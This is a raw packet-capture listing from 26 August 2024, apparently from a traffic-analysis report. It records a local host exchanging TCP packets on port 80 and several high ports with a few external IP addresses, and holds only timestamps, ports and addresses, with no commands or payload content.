Aug 26, 2024 23:29:26.698152065 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.698168993 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.698188066 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.698199987 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.698261023 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.698271036 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.698282957 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.698467970 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.698527098 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.698539019 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.698550940 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.698561907 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.698584080 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.698626041 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.698648930 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.698652029 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.698663950 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.698678017 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.698712111 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.698734045 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.698744059 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.698760033 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.698771954 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.698822975 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.698822975 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.698874950 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.698890924 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.698903084 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.698920012 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.698930979 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.698940992 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.698956013 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.698967934 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.698980093 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.699007988 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699018002 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699023008 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.699029922 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699039936 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699060917 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699071884 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.699083090 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.699106932 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699119091 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699129105 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699134111 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.699151039 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.699184895 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.699194908 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699206114 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699223042 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699233055 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699243069 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699254990 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699265957 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.699280024 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699291945 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699301958 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699310064 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.699323893 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699340105 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.699340105 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.699383020 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.699446917 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699457884 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699467897 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699477911 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699489117 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699495077 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.699506044 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699508905 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.699517965 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699527979 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699531078 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.699539900 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699549913 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699552059 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.699552059 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.699568033 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699573994 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.699577093 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699589014 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699599981 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.699601889 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699613094 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699624062 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.699629068 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.699629068 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.699748993 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.703412056 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:26.745888948 CEST	49729	45580	192.168.2.7	65.21.18.51
Aug 26, 2024 23:29:26.767709017 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:26.767805099 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:26.767811060 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:26.767816067 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:26.767827988 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:26.767838955 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:26.767848969 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:26.767860889 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:26.767865896 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:26.767880917 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:26.767901897 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:26.767913103 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:26.767923117 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:26.767924070 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:26.768012047 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:26.768389940 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:26.768537045 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:26.772671938 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:26.772739887 CEST	80	49738	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:26.772747993 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:26.772809029 CEST	49738	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:26.774136066 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:26.776231050 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:26.781018972 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:26.782943010 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.782953978 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.783055067 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.783081055 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.783092022 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.783107042 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.783118010 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.783129930 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.783144951 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.783168077 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.783225060 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.783294916 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.783305883 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.783353090 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.783353090 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.783382893 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.783396006 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.783406019 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.783417940 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.783430099 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.783446074 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.783467054 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.783467054 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.783775091 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.783818960 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.783829927 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.783847094 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.783901930 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.783926964 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.783937931 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.783946991 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.783957958 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.783967018 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.783972979 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.783972979 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.784017086 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.784017086 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.785168886 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785242081 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.785270929 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785286903 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785296917 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785317898 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.785377026 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785377026 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.785388947 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785398960 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785413027 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785440922 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.785449982 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.785545111 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.785610914 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785621881 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785631895 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785679102 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.785706043 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785717964 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785727978 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785739899 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785749912 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785751104 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.785762072 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785774946 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.785783052 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.785830021 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.785850048 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785861015 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785871983 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785883904 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785893917 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785896063 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.785906076 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785914898 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785926104 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785933971 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.785933971 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.785937071 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785947084 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.785970926 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.786015034 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.786081076 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.786092043 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.786102057 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.786142111 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.786154985 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.786158085 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.786158085 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.786164999 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.786176920 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.786179066 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.786201954 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.786215067 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.786348104 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.786365032 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.786375046 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.786385059 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.786391973 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.786396027 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.786406040 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.786411047 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.786423922 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.786433935 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.786443949 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.786448956 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.786454916 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.786464930 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.786468029 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.786511898 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.786515951 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.786515951 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.786523104 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.786533117 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.786541939 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.786551952 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.786577940 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.786694050 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.786937952 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.787007093 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.787030935 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.787041903 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.787051916 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.787064075 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.787075043 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.787076950 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.787086010 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.787097931 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.787132978 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.787133932 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.787204981 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.787214994 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.787266016 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.787276983 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.787292957 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.787314892 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.844655037 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.844676971 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.844686985 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.844724894 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.844736099 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.844746113 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.844748974 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.844748974 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.844757080 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.844777107 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.844818115 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.844841957 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.844845057 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.844856024 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.844871044 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.844928980 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.844939947 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.844952106 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.844953060 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.844973087 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.845021009 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.845031977 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.845041990 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.845052004 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.845053911 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.845062971 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.845109940 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.845125914 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.845136881 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.845143080 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.845151901 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.845155954 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.845165014 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.845175982 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.845216990 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.845216990 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.845290899 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.845357895 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.845370054 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.845405102 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.845406055 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.845436096 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.845467091 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.845468998 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.845479012 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.845488071 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.845493078 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.845514059 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.845604897 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.845732927 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.845742941 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.845757008 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.845805883 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.845805883 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.845880032 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.845889091 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.845897913 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.845937967 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.845937967 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.871515989 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.871527910 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.871543884 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.871565104 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.871567965 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.871575117 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.871586084 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.871591091 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.871596098 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.871606112 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.871620893 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.871655941 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.871655941 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.871820927 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.871831894 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.871843100 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.871855974 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.871880054 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.871886015 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.871896982 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.871906996 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:26.871915102 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.871929884 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.871995926 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:26.872296095 CEST	80	49733	185.215.113.17	192.168.2.7
